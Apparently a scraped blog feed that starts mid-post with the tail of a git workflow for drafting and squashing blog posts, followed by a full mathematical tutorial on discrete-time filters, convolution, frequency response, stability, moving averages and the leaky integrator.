highlighter-rouge">push</code> behavior to <code class="language-plaintext highlighter-rouge">current</code>, which pushes the current branch to a branch of the same name in the remote [4]:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git config push.default current</code></pre></figure> <p>So we can simply do:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git commit <span class="nt">-am</span> <span class="s2">"backup"</span> git push origin</code></pre></figure> <h2 id="merging">Merging</h2> <p>Once the post is ready for publishing, we want to merge it into master, but we don’t want all those dummy backup commits polluting the logs.</p> <p>This <a href="https://stackoverflow.com/questions/25356810/git-how-to-squash-all-commits-on-branch">Stack Overflow answer</a> [2] provides a way to squash all the commits from a branch into a single one:</p> <figure class="highlight"><pre><code class="language-bash"
data-lang="bash">git checkout post-writing git reset <span class="si">$(</span>git merge-base master <span class="si">$(</span>git branch <span class="nt">--show-current</span><span class="si">))</span> git add <span class="nt">-A</span> git commit <span class="nt">-m</span> <span class="s2">"new post: writing posts"</span></code></pre></figure> <p>Let’s analyze the second command:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git branch <span class="nt">--show-current</span></code></pre></figure> <p>Simply returns the current branch name <code class="language-plaintext highlighter-rouge">post-writing</code>. Wrapped in <code class="language-plaintext highlighter-rouge">$()</code>, the command is substituted by its output, thus</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git merge-base master <span class="si">$(</span>git branch <span class="nt">--show-current</span><span class="si">)</span></code></pre></figure> <p>is really</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git merge-base master post-writing</code></pre></figure> <p>The command above returns the <code class="language-plaintext highlighter-rouge">&lt;hash&gt;</code> of the commit that is the lowest common ancestor of both <code class="language-plaintext highlighter-rouge">master</code> and <code class="language-plaintext highlighter-rouge">post-writing</code>.
Finally we do</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git reset &lt;<span class="nb">hash</span><span class="o">&gt;</span></code></pre></figure> <p>This will set the current index back to that ancestor commit, and the changes from <code class="language-plaintext highlighter-rouge">post-writing</code> relative to that ancestor will show up as un-committed changes.</p> <p>This command assumes <code class="language-plaintext highlighter-rouge">post-writing</code> was created off <code class="language-plaintext highlighter-rouge">master</code>. If it was created off some other branch <code class="language-plaintext highlighter-rouge">foo</code>, resetting the index would include changes from <code class="language-plaintext highlighter-rouge">foo</code> as well. Hence the note in the <em>Writing</em> section.</p> <p>To simplify things, we can alias the second command as <code class="language-plaintext highlighter-rouge">compress</code> (note the single quotes, so the command substitutions run when the alias is invoked, not when it’s defined):</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git config alias.compress <span class="s1">'! git reset $(git merge-base master $(git branch --show-current))'</span></code></pre></figure> <p>Now we can merge it into master:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git checkout master git merge post-writing</code></pre></figure> <h2 id="syncing">Syncing</h2> <p>Finally we can make the post public by pushing it to the public remote:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git push public</code></pre></figure> <h2 id="post-editing">Post-editing</h2> <p>I usually want to fix typos or reword phrases after the post has been published.
For this flow I don’t bother creating branches or squashing commits and do everything from the <code class="language-plaintext highlighter-rouge">master</code> branch in <code class="language-plaintext highlighter-rouge">draft-blog</code>.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git checkout master <span class="c"># fix / reword ...</span> git commit <span class="nt">-am</span> <span class="s1">'fix typos'</span> git push public</code></pre></figure> <h2 id="conclusion">Conclusion</h2> <p>I only use Git for basic stuff (at work we use some flavor of Mercurial) and whenever I have to do some operation I’m not used to, Git gives me impostor syndrome.</p> <p>I think I got a good handle on working with remotes through this process of trying to document my workflow. Having to set up another remote and looking into different <code class="language-plaintext highlighter-rouge">push</code> behaviors made things a lot clearer.</p> <p>Though it’s worth noting my flow is super simple because I mostly write on one computer (occasionally I also write on a Linux machine) and each post is its own file, so conflicts are almost non-existent.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://stackoverflow.com/questions/7983204/having-a-private-branch-of-a-public-repo-on-github">1</a>] Stack Overflow: Having a private branch of a public repo on GitHub?</li> <li>[<a href="https://stackoverflow.com/questions/25356810/git-how-to-squash-all-commits-on-branch">2</a>] Git: How to squash all commits on branch</li> <li>[<a href="https://docs.github.com/en/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-github/duplicating-a-repository">3</a>] Duplicating a repository</li> <li>[<a href="https://stackoverflow.com/questions/948354/default-behavior-of-git-push-without-a-branch-specified">4</a>] Default behavior of “git push” without a branch specified</li> </ul>Guilherme KunigamiThis is a meta post to describe my flow 
for writing posts. When I moved to static Github pages over a year ago, I didn’t have a flow that I was satisfied with but I’ve recently settled on one which I think is worth documenting.Discrete Time Filters2021-08-31T00:00:00+00:002021-08-31T00:00:00+00:00https://www.kuniga.me/blog/2021/08/31/discrete-time-filters <p>In this post we’ll learn about discrete filters, including definitions, some properties and examples.</p> <!--more--> <h2 id="discrete-filter">Discrete Filter</h2> <p>A <strong>discrete-time system</strong> is a transform that takes in discrete-time sequences as inputs and produces another discrete-time sequence at its output. In the general case we can think of it as a function $\mathscr{H}$ from a vector $\vec{x}$ to another vector $\vec{y}$ that is also dependent on the time parameter $t$:</p> $y_t = \mathscr{H}(\vec{x}, t)$ <p>Note: the input of the function is $\vec{x}$, not $x_t$ because $y_t$ could depend on more than just $x_t$, for example a window function where $y_t = x_{t-1} + x_{t} + x_{t+1}$.</p> <p>A discrete-time system is said to be <strong>linear</strong> if it satisfies:</p> $\mathscr{H}(\alpha \vec{x} + \beta \vec{y}, t) = \alpha \mathscr{H}(\vec{x}, t) + \beta \mathscr{H}(\vec{y}, t)$ <p>A discrete-time system is said to be <strong>time-invariant</strong> if it doesn’t actually depend on $t$. That is, if we shift the signal $x$ (by adding a delay $\Delta$), the output is also shifted by $\Delta$ but doesn’t otherwise change.</p> <p>In  the authors provide a good example to make this distinction clear. 
A transform $\mathscr{H}(x_t, t) = t x_t$ is time-<em>variant</em>, because if we shift $\vec{x}$ by $1/2$ the output doesn’t simply shift, it changes “shape”.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/time-dependent.png" alt="2 charts describing before and after a time dependent transform" /> <figcaption>Figure 1: Time-dependent Transform.</figcaption> </figure> <p>On the other hand $\mathscr{H}(x_t, t) = x^2_t$ is time-invariant, since the output for the shifted $\vec{x}$ is basically $\vec{y}$ shifted by the same amount.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/time-independent.png" alt="2 charts describing before and after a time independent transform" /> <figcaption>Figure 2: Time-independent Transform.</figcaption> </figure> <p>A discrete-time system that is both <em>linear</em> and <em>time-invariant</em> (also known as LTI) is what we call a <strong>discrete filter</strong>. We’ll focus on discrete filters in this post, so henceforth we’ll assume $\mathscr{H}$ is an LTI function.</p> <h2 id="convolution">Convolution</h2> <h3 id="the-impulse-response">The impulse response</h3> <p>An <strong>impulse signal</strong> $\delta$ is a vector filled with all zeros except the entry at $t = 0$, which is 1.</p> <p>The result of applying a discrete filter $\mathscr{H}$ over $\delta$ is called an <strong>impulse response</strong>, often denoted as $h$:</p> $h_t = \mathscr{H}(\delta, t)$ <h3 id="the-reproducing-formula">The Reproducing Formula</h3> <p>We can recover the entry of vector $\vec{x}$ at $t$ by multiplying it with shifted copies of $\delta$ and summing:</p> $(1) \quad x_t = \sum_{k = -\infty}^{\infty} x_k \delta_{t - k}$ <p>which is known as the <strong>reproducing formula</strong>. 
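As a quick numerical check of (1) on a finite stand-in for $\vec{x}$ (a sketch assuming NumPy; not part of the original post):

```python
import numpy as np

# Finite stand-in for the infinite vector x (zero outside its support).
x = np.array([2.0, -1.0, 3.0, 0.5])

def delta(t):
    """Impulse signal: 1 at t = 0, 0 elsewhere."""
    return 1.0 if t == 0 else 0.0

# x_t = sum_k x_k * delta_{t - k}: the only non-zero term is k = t.
reproduced = np.array(
    [sum(x[k] * delta(t - k) for k in range(len(x))) for t in range(len(x))]
)

assert np.allclose(reproduced, x)
```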
To see why this identity is true, we observe that the only case in which $\delta_{t - k}$ is non-zero is when $k = t$.</p> <h3 id="convolution-operator">Convolution Operator</h3> <p>We can apply $\mathscr{H}$ over (1) to get $y_t$:</p> $y_t = \mathscr{H}(\vec{x}, t) = \mathscr{H}(\sum_{k = -\infty}^{\infty} x_k \delta_{t - k}, t)$ <p>One key observation is that in (1), $x_k$ can be seen as the scalar multiplying the vector $\delta$ shifted by $k$. Thus we can apply linearity to move $\mathscr{H}$ inside the sum, and time-invariance to write $\mathscr{H}(\delta_{t - k}, t) = h_{t - k}$:</p> $y_t = \sum_{k = -\infty}^{\infty} x_k \mathscr{H}(\delta_{t - k}, t) = \sum_{k = -\infty}^{\infty} x_k h_{t - k}$ <p>This last sum is the definition of the convolution operator for a given index $t$, which is basically an inner product of infinite-length vectors where one of the vectors has its index $k$ reversed ($-k$) and then shifted ($-k + t$).</p> <p>We can define the convolution at the vector level, in which case it can be more simply stated using the $*$ symbol:</p> $\vec{y} = \vec{x} * \vec{h}$ <p>We can now observe that a filter $\mathscr{H}$ can be fully described by the vector $h$.</p> <h3 id="properties">Properties</h3> <p>If the input is a square summable sequence, it’s possible to show the convolution operator is <strong>associative</strong>:</p> $(\vec{x} * \vec{h}) * \vec{w} = \vec{x} * (\vec{h} * \vec{w})$ <p>If $\vec{h}$ and $\vec{w}$ are the impulse responses of filters $\mathscr{H}$ and $\mathscr{W}$, this implies there exists a filter whose impulse response is $(\vec{h} * \vec{w})$ which is equivalent to passing $\vec{x}$ through filters $\mathscr{H}$ and then $\mathscr{W}$.</p> <p>The convolution operator is <strong>commutative</strong>, so the order in which we apply filters is irrelevant.</p> <h2 id="frequency-domain">Frequency Domain</h2> <p>Suppose we feed a filter a complex exponential signal, as defined in our <a 
href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">previous post</a>:</p> $x_t = A e^{i (\omega t + \phi)}$ <p>We can obtain the output via a convolution:</p> $\mathscr{H}(\vec{x}, t) = \vec{x} * \vec{h} = \sum_{k = -\infty}^{\infty} x_k h_{t - k}$ <p>Since convolution is commutative,</p> $= \sum_{k = -\infty}^{\infty} h_{k} x_{t - k} = \sum_{k = -\infty}^{\infty} h_{k} A e^{i (\omega (t - k) + \phi)}$ <p>Moving the factors that do not depend on $k$ out of the sum,</p> $= A e^{i (\omega t + \phi)} \sum_{k = -\infty}^{\infty} h_k e^{- i \omega k}$ <p>Now we recall the definition of DTFT as equation (6) from :</p> $\lambda(\omega) = \sum_{t = 0}^{N-1} x_t e^{-i \omega t} \quad 0 \le \omega \le 2 \pi$ <p>With $N \rightarrow \infty$ and given it’s possible to show in this case that the sum over $[0, \infty]$ results in the same as $[-\infty, \infty]$, we can define $H(\omega)$ as the DTFT of the vector $\vec{h}$ and obtain:</p> $(2) \qquad \mathscr{H}(\vec{x}, t) = A e^{i (\omega t + \phi)} H(\omega)$ <p>$H(\omega)$ is also called the <strong>frequency response</strong> of the filter at frequency $\omega$.</p> <p>Consider the polar form of $H(\omega)$ as:</p> $H(\omega) = A_0 e^{i \theta_0}$ <p>We define the <em>amplitude</em> as $\abs{H(\omega)} = \abs{A_0}$ and the <em>phase</em> as $\angle H(\omega) = \theta_0$. When we use this canonical form in (2) we get:</p> $\mathscr{H}(\vec{x}, t) = A A_0 e^{i (\omega t + \phi + \theta_0)}$ <p>Thus we can observe the filter <em>scales</em> the amplitude of the original signal by $A_0$ and <em>shifts</em> its phase by $\theta_0$.</p> <h3 id="convolution-and-modulation">Convolution and Modulation</h3> <p>Let $\vec{x}$ and $\vec{y}$ be two absolutely summable vectors and $z = x * y$ their convolution. 
We show that the DTFT of $z$, $Z(\omega)$, is the product of the DTFTs of $x$ and $y$, $Z(\omega) = X(\omega) Y(\omega)$, which is known as the <strong>convolution theorem</strong>.</p> <p><em>Proof.</em></p> <p>Let’s apply the DTFT over the expanded sum of the convolution:</p> $Z(\omega) = \sum_{t = -\infty}^{\infty} \sum_{k = -\infty}^{\infty} x_k y_{t - k} e^{-i \omega t}$ <p>Since $\vec{x}$ and $\vec{y}$ are absolutely summable, these sums are finite and can be swapped and their terms re-arranged:</p> $= \sum_{k = -\infty}^{\infty} (x_k \sum_{t = -\infty}^{\infty} y_{t - k} e^{-i \omega t})$ <p>We can “borrow” a factor of $e^{-i \omega k}$ from $e^{-i \omega t}$ just to obtain the form we want:</p> $Z(\omega) = \sum_{k = -\infty}^{\infty} (x_k e^{-i \omega k} \sum_{t = -\infty}^{\infty} y_{t - k} e^{-i \omega (t - k)})$ <p>We can re-index $t$ as, say $t’ = t - k$, for any $k$, so that the infinite sum is preserved (see Appendix for a more formal argument), i.e.</p> $\sum_{t = -\infty}^{\infty} y_{t - k} e^{-i \omega (t - k)} = \sum_{t' = -\infty}^{\infty} y_{t'} e^{-i \omega t'}, \qquad k \in \mathbb{Z}$ <p>Then we can obtain two independent sums:</p> $Z(\omega) = (\sum_{k = -\infty}^{\infty} x_k e^{-i \omega k}) (\sum_{t' = -\infty}^{\infty} y_{t'} e^{-i \omega t'}) = X(\omega) Y(\omega)$ <p><em>QED.</em></p> <p>We can also show that the convolution of the DTFTs of $\vec{x}$ and $\vec{y}$ corresponds to the DTFT of their product. 
That is, if $Z(\omega) = X(\omega) * Y(\omega)$, then $z_t = x_t y_t$, where the definition of the convolution for continuous functions is:</p> $(3) \quad X(\omega) * Y(\omega) = \int_{0}^{2 \pi} X(\sigma) Y(\omega - \sigma) d\sigma$ <p>This is known as the <strong>modulation theorem</strong>.</p> <p><em>Proof.</em></p> <p>Let’s recall the definition of the inverse of the DTFT (equation (5) in ):</p> $x_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega) e^{i \omega t} d\omega$ <p>Applying it for $Z(\omega)$:</p> $z_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega) * Y(\omega) e^{i \omega t} d\omega$ <p>Replacing (3) (commutative form):</p> $= \frac{1}{2 \pi} \int_{0}^{2 \pi} \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega - \sigma) Y(\sigma) e^{i \omega t} d\sigma d\omega$ <p>Splitting $\omega$ into $(\omega - \sigma) + \sigma$:</p> $= \frac{1}{2 \pi} \int_{0}^{2 \pi} \frac{1}{2 \pi} \int_{0}^{2 \pi} (X(\omega - \sigma)e^{i (\omega - \sigma) t}) (Y(\sigma) e^{i \sigma t}) d\sigma d\omega$ <p>Given the periodic nature of the DTFT, shifting the integration variable by a given amount $\sigma$ doesn’t change the result, so the inner integral over $\omega$ does not depend on $\sigma$:</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega - \sigma) e^{i (\omega - \sigma) t} d\omega = \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega) e^{i \omega t} d\omega = x_t$ <p>We can use this to obtain two independent integrals:</p> $z_t = \left(\frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega - \sigma) e^{i (\omega - \sigma) t} d\omega\right) \left(\frac{1}{2 \pi} \int_{0}^{2 \pi} Y(\sigma) e^{i \sigma t} d\sigma\right)$ <p>which corresponds to $x_t y_t$.</p> <h2 id="properties-1">Properties</h2> <h3 id="iir-vs-fir">IIR vs FIR</h3> <p>The impulse response of a filter is always an infinite vector since the impulse vector is also infinite. 
The non-zero entries of the impulse response are called <strong>taps</strong>.</p> <p><em>Infinite-impulse response</em> (<strong>IIR</strong>) filters are filters whose impulse responses have an infinite number of taps, as opposed to <em>finite-impulse response</em> (<strong>FIR</strong>). The latter’s impulse response is a <em>finite-support</em> signal (recall it’s an infinite signal created by padding a finite one with 0s).</p> <h3 id="causality">Causality</h3> <p>A <strong>causal</strong> filter is one that does not depend on the future, which means in $y_t = \mathscr{H}(\vec{x}, t)$, $y_t$ will only be defined in terms of $x_k$ for $k \le t$. So in</p> $y_t = \sum_{k = -\infty}^{\infty} x_k h_{t - k}$ <p>we want $h_{t - k}$ to be 0 if $k &gt; t$. If we call $z = t - k$, then $k &gt; t$ implies $z &lt; 0$ and thus $h_z = 0$ for $z &lt; 0$. In other words, $\vec{h}$ must be zero for negative indices.</p> <p>Causality is important in real-time systems, where we only have the signal up to the current timestamp $t$.</p> <h3 id="stability">Stability</h3> <p>A system is called bounded-input bounded-output (BIBO) if the output is bounded when the input is bounded. By bounded we mean that each entry in the vector is finite, or more formally, there exists $L \in \mathbb{R}^{+}$ such that $\abs{x_n} &lt; L$ for all $n$.</p> <p>A necessary and sufficient condition for a filter to be BIBO is for its impulse response $\vec{h}$ to be absolutely summable.</p> <p><strong>Proof.</strong> For the sufficiency, suppose $\vec{h}$ is absolutely summable, that is,</p> $\sum_{k = -\infty}^{\infty} \abs{h_k} &lt; \infty$ <p>We want to show $\abs{y_n}$ is bounded when $\abs{x_n}$ is bounded. 
We have</p> $\abs{y_n} = \abs{\sum_{k = -\infty}^{\infty} x_k h_{n - k}} \le \sum_{k = -\infty}^{\infty} \abs{x_k h_{n - k}} = \sum_{k = -\infty}^{\infty} \abs{x_k} \abs{h_{n - k}}$ <p>There exists some $L$ such that $\abs{x_n} &lt; L$, so</p> $\abs{y_n} &lt; L \sum_{k = -\infty}^{\infty} \abs{h_{n - k}}$ <p>And we started from the hypothesis that the last sum is finite, so $\abs{y_n}$ is also finite.</p> <p>For the necessity, we just need to show an example where $\vec{h}$ is <strong>not</strong> absolutely summable, $\vec{x}$ is bounded and $\vec{y}$ is not. We define $x_n = \mbox{sign}(h_{-n})$, that is $x_n \in \curly{-1, 0, 1}$ and thus bounded.</p> <p>If we consider $\abs{y_t}$ for $t = 0$:</p> $\abs{y_0} = \abs{\sum_{k = -\infty}^{\infty} x_k h_{-k}}$ <p>The term $x_k h_{-k}$ is equal to $\abs{h_{-k}}$ (from our choice of $x_k$), so</p> $\abs{y_0} = \sum_{k = -\infty}^{\infty} \abs{h_{-k}}$ <p>which we assumed is infinite. <em>QED</em></p> <p>Because FIR filters’ impulse responses have a finite number of non-zero terms, they’re absolutely summable, hence FIR filters are BIBO.</p> <h3 id="magnitude">Magnitude</h3> <p>As we discussed earlier, the amplitude of the frequency response $H(\omega)$ scales the amplitude of the original signal when a filter is applied. 
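This scaling can be checked numerically: filter a complex exponential and compare the output, away from the boundary, with the input scaled by $H(\omega)$. A sketch assuming NumPy; the 3-tap filter and the frequency $\omega = 0.7$ are arbitrary choices, not from the original post:

```python
import numpy as np

h = np.array([1/3, 1/3, 1/3])  # 3-tap FIR impulse response
omega = 0.7

# Frequency response: DTFT of h, a finite sum since h is FIR.
H = sum(h[k] * np.exp(-1j * omega * k) for k in range(len(h)))

# Filter a complex exponential via convolution.
t = np.arange(200)
x = np.exp(1j * omega * t)
y = np.convolve(x, h)

# In the interior, y_t = H(omega) * x_t: amplitude scaled by |H(omega)|
# and phase shifted by angle(H(omega)).
assert np.allclose(y[50], H * x[50])
```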
The frequency response is a function which can return different amplitudes for different frequencies $0 \le \omega \le 2 \pi$, and can thus be used to boost certain frequencies and attenuate others.</p> <p>We can categorize filters based on what types of frequencies they boost (if any).</p> <ul> <li><strong>Lowpass filters.</strong> The amplification is concentrated at low frequencies, around $\omega = 0$ (equivalently $2 \pi$).</li> <li><strong>Highpass filters.</strong> The amplification is concentrated at high frequencies, around $\omega = \pi$.</li> <li><strong>Bandpass filters.</strong> The amplification is concentrated at specific frequencies $\omega_p$.</li> <li><strong>Allpass filters.</strong> The amplification is uniform across the spectrum.</li> </ul> <p>The names are very intuitive: the “pass” indicates which frequencies the filter allows through.</p> <h3 id="phase">Phase</h3> <p>As we discussed earlier, the phase of the frequency response $H(\omega)$ corresponds to a shift on the frequencies of the input signal. In the time domain, this corresponds to a delay.</p> <p>Consider a sinusoidal signal $x_t = e^{i \omega t}$ and let’s assume $t$ is continuous. Suppose we apply a filter with amplitude $A_0 = 1$ and phase $\theta_0$. Once we apply the filter we get $y_t = e^{i (\omega t + \theta_0)}$.</p> <p>Using Euler’s identity, the real part of $y_t$ is $\cos (\omega t + \theta_0)$. If we define $t_0 = - \frac{\theta_0}{\omega}$, known as <strong>phase delay</strong>, we have $\cos (\omega (t - t_0))$. 
If we plot this (continuous) function, we’ll see that each point $x_t$ is delayed by an amount $t_0$ in $y_t$.</p> <p>For the discrete time case, because we’re sampling at regular intervals that might not align with the delay, there might not be a 1:1 mapping between $x_t$ and $y_t$.</p> <p>The frequency response $H(\omega)$ might have different phases for different frequencies $\omega$, thus each frequency of the input signal might be shifted by different amounts, so even if the filter has amplitude $A_0 = 1$, the “shape” of the output signal might be different.</p> <p><strong>Linear Phase.</strong> A linear phase filter is one whose phase function $\angle H(\omega)$ is linear in $\omega$, that is, $\angle H(\omega) = \omega d$, $d \in \mathbb{R}$.</p> <p>Assuming $A_0 = 1$, now the output signal is $y_t = e^{i (\omega (t + d))}$, thus the signal gets shifted by the same amount at all its frequencies and the “shape” of the output would be the same as the input.</p> <p><strong>Locally Linear Phase.</strong> Even for non-linear phase filters, it’s possible to have approximately linear behavior around specific frequencies.</p> <p>Consider a specific frequency $\omega_0$ and any other frequency $\omega$ around it, and $\omega - \omega_0 = \tau$. We can approximate $\angle H(\omega)$ by a linear function around $\omega_0$ by using a first-order Taylor approximation:</p> $\angle H(\omega_0 + \tau) = \angle H(\omega_0) + \tau \angle H'(\omega_0)$ <p>We then have</p> $H(\omega_0 + \tau) = \abs{H(\omega_0 + \tau)} e^{i \angle H(\omega_0 + \tau)} = (\abs{H(\omega_0 + \tau)} e^{i \angle H(\omega_0)}) e^{i \angle H'(\omega_0) \tau}$ <p>We can see this as an extra phase shift of $\angle H’(\omega_0) \tau$. 
The negative of $\angle H’(\omega_0)$ is defined as the <strong>group delay</strong>.</p> <h2 id="examples">Examples</h2> <p>Let’s consider two basic filters and investigate some of their properties.</p> <h3 id="moving-average">Moving Average</h3> <p>A classic example of a filter is the moving average, which consists of taking the average of the previous $N$ samples:</p> $y_t = \mathscr{H}(\vec{x}, t) = \frac{1}{N} \sum_{k = 0}^{N - 1} x_{t - k}$ <p>We can apply $\mathscr{H}$ to $\delta$ to obtain the impulse response:</p> $h_t = \frac{1}{N} \sum_{k = 0}^{N - 1} \delta_{t - k}$ <p>Recall that the only non-zero entry in $\vec{\delta}$ is when $t = k$, so the sum is $\frac{1}{N}$, unless the range $[0, N - 1]$ doesn’t include $t$, that is, if $t &lt; 0$ or $t \ge N$, summarizing:</p> $\begin{equation} h_t =\left\{ \begin{array}{@{}ll@{}} \frac{1}{N}, &amp; \text{if}\ 0 \le t &lt; N \\ 0, &amp; \text{otherwise} \end{array}\right. \end{equation}$ <p>which means it has a finite number of non-zero entries and thus $\mathscr{H}$ is a FIR filter. This specific definition of moving average is also <em>causal</em>.</p> <p>It’s possible to show that the <em>frequency response</em> of this filter is</p> $H(\omega) = \frac{1}{N} \frac{\sin(\omega N/2)}{\sin(\omega / 2)} e^{-i \frac{N -1}{2} \omega}$ <p>If we plot the amplitude (see Figure 3), we can see that it magnifies mostly low frequencies, which matches the intuition that the moving average smooths a signal, removing high-frequency noise.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/mag-mov-avg.png" alt="Line chart of magnitude vs. frequency" /> <figcaption>Figure 3: Magnitude of the moving average filter.</figcaption> </figure> <p>We can also plot the phase delay from above, which is $\frac{N-1}{2}$. 
It matches the intuition that when we average the last $N$ points the “center of gravity” is in the middle of this window.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/phase-mov-avg.png" alt="Line chart of phase vs. frequency" /> <figcaption>Figure 4: Phase delay of the moving average filter.</figcaption> </figure> <h3 id="leaky-integrator">Leaky Integrator</h3> <p>Suppose we parametrize the moving average by the window size $N$:</p> $\mathscr{H}_N(\vec{x}, t) = \frac{1}{N} \sum_{k = 0}^{N - 1} x_{t - k}$ <p>We can then write $\mathscr{H}_{N}(\vec{x}, t)$ in terms of $\mathscr{H}_{N - 1}(\vec{x}, t - 1)$, noting that the latter is:</p> $(4) \quad \mathscr{H}_{N - 1}(\vec{x}, t - 1) = \frac{1}{N - 1} \sum_{k = 0}^{N - 2} x_{t - 1 - k} = \frac{1}{N - 1} \sum_{k = 1}^{N - 1} x_{t - k}$ <p>Now, starting from $\mathscr{H}_{N}(\vec{x}, t)$, we first extract the first term out of the sum (i.e. when $k = 0$):</p> $= \frac{1}{N} (x_t + \sum_{k=1}^{N-1} x_{t - k})$ <p>Normalizing the denominator of the second term to $N - 1$:</p> $= \frac{1}{N} x_{t} + \frac{N - 1}{N} \frac{1}{N - 1} \sum_{k=1}^{N-1} x_{t - k}$ <p>We can replace (4) here:</p> $= \frac{1}{N} x_{t} + \frac{N - 1}{N} \mathscr{H}_{N - 1}(\vec{x}, t - 1)$ <p>If we call $\lambda_N = \frac{N - 1}{N}$, then $\frac{1}{N} = 1 - \lambda_N$:</p> $\mathscr{H}_{N}(\vec{x}, t) = \lambda_N \mathscr{H}_{N - 1}(\vec{x}, t - 1) + (1 - \lambda_N) x_{t}$ <p>As $N$ becomes large, adding a term to the average changes little, so $\mathscr{H}_{N+1}$ and $\mathscr{H}_{N}$ become approximately the same. Thus, assuming a sufficiently large $N$ we can drop the $N$ parameter to get:</p> $\mathscr{H}(\vec{x}, t) = \lambda \mathscr{H}(\vec{x}, t - 1) + (1 - \lambda) x_{t}$ <p>or in terms of $\vec{y}$,</p> $y_t = \lambda y_{t - 1} + (1 - \lambda) x_t$ <p>This system is known as the <strong>leaky integrator</strong>. 
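A small sanity check of the recurrence (a sketch assuming NumPy; not part of the original post): running $y_t = \lambda y_{t-1} + (1 - \lambda) x_t$ with $y$ starting at zero matches its unrolled form, a geometrically weighted sum of past samples:

```python
import numpy as np

lam = 0.9
x = np.array([1.0, 2.0, -1.0, 0.5, 3.0])

# Leaky integrator via the recurrence, with y_t = 0 before t = 0.
y = np.zeros(len(x))
prev = 0.0
for t in range(len(x)):
    prev = lam * prev + (1 - lam) * x[t]
    y[t] = prev

# Unrolled form: y_t = (1 - lam) * sum_{k=0}^{t} lam^k * x_{t-k}.
unrolled = np.array(
    [(1 - lam) * sum(lam**k * x[t - k] for k in range(t + 1)) for t in range(len(x))]
)

assert np.allclose(y, unrolled)
```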
When $\lambda \rightarrow 1$, then $N \rightarrow \infty$, and this filter is simply the sum of the terms of $\vec{x}$, thus an integrator. Since in reality it is not exactly 1, it doesn’t account for all the terms, so it “leaks”.</p> <p>It’s possible to show this is an LTI system (a filter), if we add a condition that $y_n$ “starts somewhere”, that is, before an instant $t_0$, all its entries are zero:</p> $y_t = 0, \qquad t &lt; t_0$ <p>In particular, we’ll assume $t_0 = 0$, which simplifies calculations. We can apply this filter to $\vec{\delta}$ to get an impulse response. We have for $t = 0$:</p> $h_0 = (1 - \lambda) \delta_0 = 1 - \lambda$ <p>For $t &gt; 0$, since $\delta_t = 0$, we have</p> $h_t = \lambda h_{t-1}$ <p>Which gives us a closed form:</p> $h_t = (1 - \lambda) \lambda^t, \qquad t \ge 0$ <p>This shows this impulse response is infinite, thus the leaky integrator is an IIR filter.</p> <p>It’s possible to show that the <em>frequency response</em> of this filter is</p> $H(\omega) = \frac{1 - \lambda}{1 - \lambda e^{-i \omega}}$ <p>With squared magnitude:</p> $\abs{H(\omega)}^2 = \frac{(1 - \lambda)^2}{1 + \lambda^2 - 2\lambda \cos(\omega)}$ <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/mag-leaky-integrator.png" alt="Line chart of magnitude vs. frequency" /> <figcaption>Figure 5: Magnitude of the leaky integrator filter.</figcaption> </figure> <p>and phase:</p> $\angle H(\omega) = \arctan \left(-\frac{\lambda \sin(\omega)}{1 - \lambda \cos(\omega)}\right)$ <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/phase-leaky-integrator.png" alt="Line chart of magnitude vs. 
frequency" /> <figcaption>Figure 6: Phase of the leaky integrator filter.</figcaption> </figure> <h2 id="appendix">Appendix</h2> <p>In <em>Convolution and Modulation</em> we claimed that we can shift the index $t$ in an infinite sum by an arbitrary amount $k \in \mathbb{Z}$, that is, given $t’ = t - k$:</p> $\sum_{t = -\infty}^{\infty} f(t) = \sum_{t' = -\infty}^{\infty} f(t')$ <p>Let’s call $T$ the set of indices corresponding to $[-\infty, \infty]$, i.e. $T$ is the set of integers $\mathbb{Z}$.</p> <p>In the second sum we have $t’ = t - k \in [-\infty, \infty]$ or $t \in ([-\infty, \infty]) + k$, which we’ll call $T’$. $T’$ is basically $T$ with $k$ added to every element. Since $k \in \mathbb{Z}$ and $\mathbb{Z}$ is closed under addition, $t + k \in \mathbb{Z}$ for every $t \in T$, so every element of $T’$ exists in $T$ as well; that is, if $t’ \in T’$ then $t’ \in T$.</p> <p>Conversely, for every $t \in T$, since $\mathbb{Z}$ is closed under subtraction we have $t - k \in T$, and thus $t = (t - k) + k$ is an element of $T’$; that is, if $t \in T$ then $t \in T’$.</p> <p>We conclude that there’s a one-to-one mapping between $T$ and $T’$ and thus the sums are over the same set of indices. <em>QED</em>.</p> <h2 id="conclusion">Conclusion</h2> <p>As in <a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">Discrete Fourier Transforms</a> we used a different notation than is usual in signal processing.</p> <p>I learned a bunch of things from this post, including: convolution, the leaky integrator, the formalism behind the “delay” from moving average filters.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="https://www.kuniga.me/blog/2021/07/31/lpc-in-python.html">Linear Predictive Coding in Python</a>. We ran into convolution in <em>The LPC Model</em> section. Note that the filter is denoted by $h_t$ like we did here, which is not a coincidence. 
